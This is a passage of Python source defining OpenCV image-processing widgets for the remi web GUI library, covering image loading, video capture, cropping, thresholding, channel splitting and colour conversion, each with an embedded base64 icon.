I5vwZJjL3xFgg/oa4kK5y3BDd3aXzTqKzlirsOwkr74HIur2TMcv75pTJsRgrOkCWn+PtsaWgJzfgbqfHVbEiltTiV30D/GbTNC8M/658TEZf8z0YF5QK3/rm8mluviQOyDUftHCO7UTqjLpAqYT1lEn0//yJVMW8m+vGCJTVgUF+m+MiR6qpPhxEhbvRyKN5TsywvOYdAvetRmAoOiF4DqQ85LRiu/9n1T1J4XbIqs2gwKCYDqM3xLmgQTjUWla16w18J9wtQC09WGuJb9k8O9H41oKxBsqY1+MxowR32Ytv4fsAuKkRGLVtmpAWarDZEwr2HYw1VjgeBJ+hBgJsoXMFMOPxNM/uvSADBXbYjCizn5ggFmMCi8DFSGYB3lV3mIyhAMg1uU4m0KKkmwQPmKDQWCvZztKqOGwVVbIQWCK+ANvgBmqQ2hDf+okNkdQGkFJvKfHmqCVH2Z6+nRkIAJftVCNQkdcaOQHD6XtiXTuitgWiumQuZx+fgPED6yi1RbbEEAAAAASUVORK5CYII="
@gui.decorate_constructor_parameter_types(["file"])
def __init__(self, filename, *args, **kwargs):
self.app_instance = None
default_style = {'position':'absolute','left':'10px','top':'10px'}
default_style.update(kwargs.get('style',{}))
kwargs['style'] = default_style
kwargs['width'] = kwargs['style'].get('width', kwargs.get('width','200px'))
kwargs['height'] = kwargs['style'].get('height', kwargs.get('height','180px'))
super(OpencvImRead, self).__init__("", *args, **kwargs)
OpencvWidget._setup(self)
self.frame_index = 0
self.set_image(filename)
def _need_update(self, emitter=None):
#overriding this method allows to correct the image url that gets updated by the editor
gui.Image.set_image(self, '/%(id)s/get_image_data?index=%(frame_index)s'% {'id': id(self), 'frame_index':0})
super(OpencvImRead, self)._need_update(emitter)
def on_new_image_listener(self, emitter):
if emitter.img is None:
return
self.set_image_data(emitter.img)
def set_image(self, filename):
self.set_image_data(cv2.imread(filename, cv2.IMREAD_COLOR)) #cv2.IMREAD_GRAYSCALE)#cv2.IMREAD_COLOR)
def set_image_data(self, img):
self.img = img
self.update()
self.on_new_image()
def search_app_instance(self, node):
if issubclass(node.__class__, remi.server.App):
return node
if not hasattr(node, "get_parent"):
return None
return self.search_app_instance(node.get_parent())
def update(self, *args):
if self.app_instance==None:
self.app_instance = self.search_app_instance(self)
if self.app_instance==None:
return
self.frame_index = self.frame_index + 1
self.app_instance.execute_javascript("""
url = '/%(id)s/get_image_data?index=%(frame_index)s';
xhr = null;
xhr = new XMLHttpRequest();
xhr.open('GET', url, true);
xhr.responseType = 'blob'
xhr.onload = function(e){
urlCreator = window.URL || window.webkitURL;
urlCreator.revokeObjectURL(document.getElementById('%(id)s').src);
imageUrl = urlCreator.createObjectURL(this.response);
document.getElementById('%(id)s').src = imageUrl;
}
xhr.send();
""" % {'id': id(self), 'frame_index':self.frame_index})
def get_image_data(self, index=0):
try:
ret, png = cv2.imencode('.png', self.img)
if ret:
headers = {'Content-type': 'image/png'}
return [png.tostring(), headers]
except:
pass
#print(traceback.format_exc())
return None, None
class OpencvVideo(OpencvImRead):
""" OpencvVideo widget.
Opens a video source and dispatches the image frame by generating on_new_image event.
The event on_new_image can be connected to other Opencv widgets for further processing
"""
icon = "data:image/png;base64,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"
@gui.decorate_constructor_parameter_types([int, int])
def __init__(self, video_source, framerate_hz, *args, **kwargs):
self.capture = cv2.VideoCapture(video_source)
self.thread_stop_flag = False
self.framerate = framerate_hz
self.frame_index = 0
self.last_frame = None
super(OpencvVideo, self).__init__("", *args, **kwargs)
self.thread = Thread(target=self.update)
self.thread.daemon = True
self.thread.start()
def set_image_data(self, image_data_as_numpy_array):
#oveloaded to avoid update
self.img = image_data_as_numpy_array
def search_app_instance(self, node):
if issubclass(node.__class__, remi.server.App):
return node
if not hasattr(node, "get_parent"):
return None
return self.search_app_instance(node.get_parent())
def __del__(self):
self.thread_stop_flag = True
super(OpencvVideo, self).__del__()
def update(self, *args):
while not self.thread_stop_flag:
time.sleep(1.0/self.framerate)
if self.app_instance==None:
self.app_instance = self.search_app_instance(self)
if self.app_instance==None:
continue
with self.app_instance.update_lock:
self.frame_index = self.frame_index + 1
self.app_instance.execute_javascript("""
var url = '/%(id)s/get_image_data?index=%(frame_index)s';
var xhr = new XMLHttpRequest();
xhr.open('GET', url, true);
xhr.responseType = 'blob'
xhr.onload = function(e){
var urlCreator = window.URL || window.webkitURL;
urlCreator.revokeObjectURL(document.getElementById('%(id)s').src);
var imageUrl = urlCreator.createObjectURL(this.response);
document.getElementById('%(id)s').src = imageUrl;
}
xhr.send();
""" % {'id': id(self), 'frame_index':self.frame_index})
def get_image_data(self, index=0):
try:
ret, frame = self.capture.read()
if ret:
self.set_image_data(frame)
self.on_new_image()
ret, png = cv2.imencode('.png', frame)
if ret:
headers = {'Content-type': 'image/png'}
# tostring is an alias to tobytes, which wasn't added till numpy 1.9
return [png.tostring(), headers]
except:
print(traceback.format_exc())
return None, None
class OpencvCrop(OpencvImRead):
""" OpencvCrop widget.
Allows to crop an image.
Receives an image on on_new_image_listener.
The event on_new_image can be connected to other Opencv widgets for further processing
"""
icon = "data:image/png;base64,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"
@gui.decorate_constructor_parameter_types([int, int, int, int])
def __init__(self, x, y, w, h, *args, **kwargs):
self.x = x
self.y = y
self.w = w
self.h = h
super(OpencvCrop, self).__init__("", *args, **kwargs)
def on_new_image_listener(self, emitter): #CROP
if emitter.img is None:
return
self.img = emitter.img[self.x:self.x+self.w, self.y:self.y+self.h]
self.set_image_data(self.img)
class OpencvThreshold(OpencvImRead):
""" OpencvThreshold widget.
Allows to threashold an image.
Receives an image on on_new_image_listener.
The event on_new_image can be connected to other Opencv widgets for further processing
"""
icon = "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADwAAAAuCAYAAAB04nriAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAETSURBVGhD7ZYBDsMgCEV197+zG+m60EwBHXaCvKRZslnhlT/TnFIqr2sbHu/PbdhO+BLpUnymO2fQPIhIe0ccaRwLjIW/QXekW7IA9duKqETakjQrbG2CHHFKe4cVlpzCll5YzEwYzhJ8jSISpiZ4x3RrgqPScNen4xWjSYlJ+8V7LBtpaJKb4siUlxOWiP4C7PzXSGvIcX3jGiJhrqmRB6U9RaoHXIuMNCyUNHauk6wFpOtm0BQebYq7b5asdN8phxYUrzUwS7aHqrBWY+c+rQegjaTGl7B2Y3eIYrh6UyK9Mhfhu6cxC8pj7wl7ojXlmLAnalOGb/pfhA0TkfZOCHsnhL0Twt4JYe+EsHdC2DcpPQHUiTG7/qs9SwAAAABJRU5ErkJggg=="
@gui.decorate_constructor_parameter_types([int])
def __init__(self, threshold_value, *args, **kwargs):
self.threshold_value = threshold_value
super(OpencvThreshold, self).__init__("", *args, **kwargs)
def on_new_image_listener(self, emitter): #THRESHOLD
if emitter.img is None:
return
img = emitter.img
if len(img.shape)>2:
img = cv2.cvtColor(emitter.img, cv2.COLOR_BGR2GRAY)
res, self.img = cv2.threshold(img,self.threshold_value,255,cv2.THRESH_BINARY)
self.set_image_data(self.img)
'''
class OpencvSimpleBlobDetector(OpencvImRead):
""" OpencvSimpleBlobDetector widget.
Allows to get blobs in an image.
Receives an image on on_new_image_listener.
The event on_blobs_detected can be connected to a listener further processing
"""
icon = "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADwAAAAuCAYAAAB04nriAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAETSURBVGhD7ZYBDsMgCEV197+zG+m60EwBHXaCvKRZslnhlT/TnFIqr2sbHu/PbdhO+BLpUnymO2fQPIhIe0ccaRwLjIW/QXekW7IA9duKqETakjQrbG2CHHFKe4cVlpzCll5YzEwYzhJ8jSISpiZ4x3RrgqPScNen4xWjSYlJ+8V7LBtpaJKb4siUlxOWiP4C7PzXSGvIcX3jGiJhrqmRB6U9RaoHXIuMNCyUNHauk6wFpOtm0BQebYq7b5asdN8phxYUrzUwS7aHqrBWY+c+rQegjaTGl7B2Y3eIYrh6UyK9Mhfhu6cxC8pj7wl7ojXlmLAnalOGb/pfhA0TkfZOCHsnhL0Twt4JYe+EsHdC2DcpPQHUiTG7/qs9SwAAAABJRU5ErkJggg=="
@gui.decorate_constructor_parameter_types([int])
def __init__(self, *args, **kwargs):
super(OpencvSimpleBlobDetector, self).__init__("", *args, **kwargs)
def on_new_image_listener(self, emitter): #THRESHOLD
if emitter.img is None:
return
img = emitter.img
self.set_image_data(self.img)
params = cv2.SimpleBlobDetector_Params()
params.filterByCircularity = False
params.filterByConvexity = False
params.filterByInertia = False
# I loghi appaiono di colore bianco
params.minThreshold = 100 # the graylevel of images
params.maxThreshold = 255
params.filterByColor = False
#params.blobColor = 255
# Filter by Area
params.filterByArea = True
params.minArea = 20
detector = cv2.SimpleBlobDetector_create(params) #SimpleBlobDetector()
# Detect blobs.
keypoints = detector.detect(diff_images.astype(np.uint8))
for k in keypoints:
cv2.circle(img, (int(k.pt[0]), int(k.pt[1])), 20, (255,0,0), 5)
'''
class OpencvSplit(OpencvImRead):
""" OpencvSplit widget.
Splits the image channels and generates a signal for each one to dispatch the results.
Receives an image on on_new_image_listener.
The event on_new_image can be connected to other Opencv widgets for further processing
The events:
- on_new_image_first_component
- on_new_image_second_component
- on_new_image_third_component
dispatch each one a single channel.
"""
icon = "data:image/png;base64,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"
@gui.decorate_constructor_parameter_types([])
def __init__(self, *args, **kwargs):
super(OpencvSplit, self).__init__("", *args, **kwargs)
self.on_new_image_first_component.do = self.do_first
self.on_new_image_second_component.do = self.do_second
self.on_new_image_third_component.do = self.do_third
def on_new_image_listener(self, emitter):
self.image_source = emitter
self.set_image_data(emitter.img)
if not self.on_new_image_first_component.callback is None:
self.on_new_image_first_component()
if not self.on_new_image_second_component.callback is None:
self.on_new_image_second_component()
if not self.on_new_image_third_component.callback is None:
self.on_new_image_third_component()
def do_first(self, callback, *userdata, **kwuserdata):
#this method gets called when an event is connected, making it possible to execute the process chain directly, before the event triggers
if hasattr(self.on_new_image_first_component.event_method_bound, '_js_code'):
self.on_new_image_first_component.event_source_instance.attributes[self.on_new_image_first_component.event_name] = self.on_new_image_first_component.event_method_bound._js_code%{
'emitter_identifier':self.on_new_image_first_component.event_source_instance.identifier, 'event_name':self.on_new_image_first_component.event_name}
self.on_new_image_first_component.callback = callback
self.on_new_image_first_component.userdata = userdata
self.on_new_image_first_component.kwuserdata = kwuserdata
#here the callback is called immediately to make it possible link to the plc
if callback is not None: #protection against the callback replacements in the editor
if hasattr(self, "image_source"):
if not self.image_source.img is None:
self.img = cv2.split(self.image_source.img)[0]
callback(self, *userdata, **kwuserdata)
@gui.decorate_set_on_listener("(self, emitter)")
@gui.decorate_event
def on_new_image_first_component(self):
if hasattr(self, "image_source"):
if not self.image_source.img is None:
self.img = cv2.split(self.image_source.img)[0]
return ()
def do_second(self, callback, *userdata, **kwuserdata):
#this method gets called when an event is connected, making it possible to execute the process chain directly, before the event triggers
if hasattr(self.on_new_image_second_component.event_method_bound, '_js_code'):
self.on_new_image_second_component.event_source_instance.attributes[self.on_new_image_second_component.event_name] = self.on_new_image_second_component.event_method_bound._js_code%{
'emitter_identifier':self.on_new_image_second_component.event_source_instance.identifier, 'event_name':self.on_new_image_second_component.event_name}
self.on_new_image_second_component.callback = callback
self.on_new_image_second_component.userdata = userdata
self.on_new_image_second_component.kwuserdata = kwuserdata
#here the callback is called immediately to make it possible link to the plc
if callback is not None: #protection against the callback replacements in the editor
if hasattr(self, "image_source"):
if not self.image_source.img is None:
self.img = cv2.split(self.image_source.img)[1]
callback(self, *userdata, **kwuserdata)
@gui.decorate_set_on_listener("(self, emitter)")
@gui.decorate_event
def on_new_image_second_component(self):
if hasattr(self, "image_source"):
if not self.image_source.img is None:
self.img = cv2.split(self.image_source.img)[1]
return ()
def do_third(self, callback, *userdata, **kwuserdata):
#this method gets called when an event is connected, making it possible to execute the process chain directly, before the event triggers
if hasattr(self.on_new_image_third_component.event_method_bound, '_js_code'):
self.on_new_image_third_component.event_source_instance.attributes[self.on_new_image_third_component.event_name] = self.on_new_image_third_component.event_method_bound._js_code%{
'emitter_identifier':self.on_new_image_third_component.event_source_instance.identifier, 'event_name':self.on_new_image_third_component.event_name}
self.on_new_image_third_component.callback = callback
self.on_new_image_third_component.userdata = userdata
self.on_new_image_third_component.kwuserdata = kwuserdata
#here the callback is called immediately to make it possible link to the plc
if callback is not None: #protection against the callback replacements in the editor
if hasattr(self, "image_source"):
if not self.image_source.img is None:
self.img = cv2.split(self.image_source.img)[2]
callback(self, *userdata, **kwuserdata)
@gui.decorate_set_on_listener("(self, emitter)")
@gui.decorate_event
def on_new_image_third_component(self):
if hasattr(self, "image_source"):
if not self.image_source.img is None:
self.img = cv2.split(self.image_source.img)[2]
return ()
class OpencvCvtColor(OpencvImRead):
""" OpencvCvtColor widget.
Convert image colorspace.
Receives an image on on_new_image_listener.
The event on_new_image can be connected to other Opencv widgets for further processing
"""
cvt_types = {'COLOR_BGR2HSV':cv2.COLOR_BGR2HSV,'COLOR_HSV2BGR':cv2.COLOR_HSV2BGR, 'COLOR_RGB2BGR':cv2.COLOR_RGB2BGR, 'COLOR_RGB2GRAY':cv2.COLOR_RGB2GRAY, 'COLOR_BGR2GRAY':cv2.COLOR_BGR2GRAY, 'COLOR_RGB2HSV':cv2.COLOR_RGB2HSV}
icon = "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAFAAAAA6CAYAAAAnft6RAAAABHNCSVQICAgIfAhkiAAAAAFzUkdCAK7OHOkAAAAEZ0FNQQAAsY8L/GEFAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAGXRFWHRTb2Z0d2FyZQB3d3cuaW5rc2NhcGUub3Jnm+48GgAAB3VJREFUeF7tm3tsW9Udx7/nXjtPQtMka5puXZu1hdCSsoZqLR1tUUtabWN9srA/OgnBgD0qhoAJNI2NfyahsvEP1TRNTNWQQOKhgtAe3aBdGQOBoBkUFbamtHnVSZw4duz4fa/Pfuf6xEkWO9dOfJLG5iNd+XeOHd97v+d3fr/fOddh+5qXcBQRr5wdkFZ+0OTr58yQlAcyTUdp3VKrs9CIDvWDJ0zLzrcHpgQsIfE2/PpVq7PQ+PfD+xAjEQWfT+ErjJwErMQQvsJPYzVOogrJES12shLQiTBuwREc5pvRhrtwO78HP+ZbsI8fRjm88lPFSRYCchzgP8Bm/jswJGRfkib8BW38LvqSZIAuRmwFXIfX0Ii3ZGsqDfgILXhWtooPWwGnE2+MRm7/mULFVsBq3iWtzNSgU1rFh62AHsq5dgziGmkVH7aF9Gqcoqz7fdlKz5/ZEXyM2y37vaH11muxYOuBF7AD57BXtqZyEdtJvIOyVXxktZQTZcom/B5b+FGrJhQYKMX7VBP+i/2E3i2x+gRjHsjoY6Vv2o7PgiS6PQFenrRzWgsLIevQQa8G3FQFJuCQ74wzJmDJKQ1PeA5YdqHxaO1xxHYka+KcXCQB3RKuH9enFa8Ymdc55r0cwfAn5+A9fxbenpDsXVjkJGAYIxhm3QhimDxw5su3cMCEd9lpbPjTadz4dg9a3nSh5cQ/Ed35Brz9MfmphYFtDOxn/8Fb+jPo1c6ScF4YLEIT2YkyXoWreT1q+Uqs4Tej2fwWjYZuGwM5nY21vY7GXekHoO8DDcGjrdCdTPZceWQdA0/pR3HMeSfa9eNwswsIMg+iJGMIPvLEHnRqH+CM/jJedDyEp0tuw+uOp+RfZsbnfj+jeIKGjQn4ne/I1pVPRgH/5ngSpx2/hZ+5ZU9mxHTuZ/+1BLejZK9fWplZtH/hxMO0An6kv4Z3tecQR0T25I/qtfaxs6Zp8rbZlcwUAaMsiJP604gwe0+ZCZ52XVqZGfwwp9w2r0y50hP6EQyyz2Qr/5gvLJFWZkafv1paanEt86Jz4wDF9Zl7/CQBY5QeOjS1e3uLr23GuT9mLsIv/lVHdfUm2VJDmJv49FA3+n42jKH7Auh4QJRmMyvLJgn4tn4MHqZ+b6/0HzvRfn8F4slltYURBc48Vob48zvBFFYwQ44oPnugB8HtMfBSq4JDZJ2B3u+6LDtXJgl4UXtXWmoRNd7i8DZ0/XA32rduRPuWr+LSfbtR038LSsrUxb/L9SNwPexC5HpD9owT2hTD5aU+2cqe1NVyigOiFJlLLCGb6rB43V